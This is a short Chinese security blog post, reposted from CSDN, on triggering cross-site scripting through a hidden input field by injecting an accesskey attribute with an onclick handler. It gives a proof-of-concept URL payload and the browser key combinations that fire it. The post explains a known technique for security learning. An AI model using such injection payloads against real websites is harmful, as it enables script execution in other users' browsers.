Hidden属性的input标签中XSS的触发方法

  • A+
所属分类:网络安全

今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:

<input type="hidden" name="returnurl" value="[USER INJECT]" />1

正常情况下的XSS应当是:

http://victim/?value=” onclick=”alert(document.domain)

但是这里由于该input 未在页面中显示,常用的onclick 方法无法使用(点不到这个标签怎么触发onclick…),不过在浏览器中还有一个好玩的属性叫accesskey 于是乎构造:

<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />1

PoC为:

http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain)

触发方法不同的浏览器不同,下面是w3school的总结: 
 Hidden属性的input标签中XSS的触发方法 
所以上面的XSS触发方法为: 
FF下:shift+alt+X (测试成功) 
Chrome:alt+X (最新版Chrome未测试成功) 
IE下:alt+X (未测试成功)

    from

    http://blog.csdn.net/change518/article/details/51024706

    • 我的微信
    • 这是我的微信扫一扫
    • weinxin
    • 我的微信公众号
    • 我的微信公众号扫一扫
    • weinxin

    发表评论

    :?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: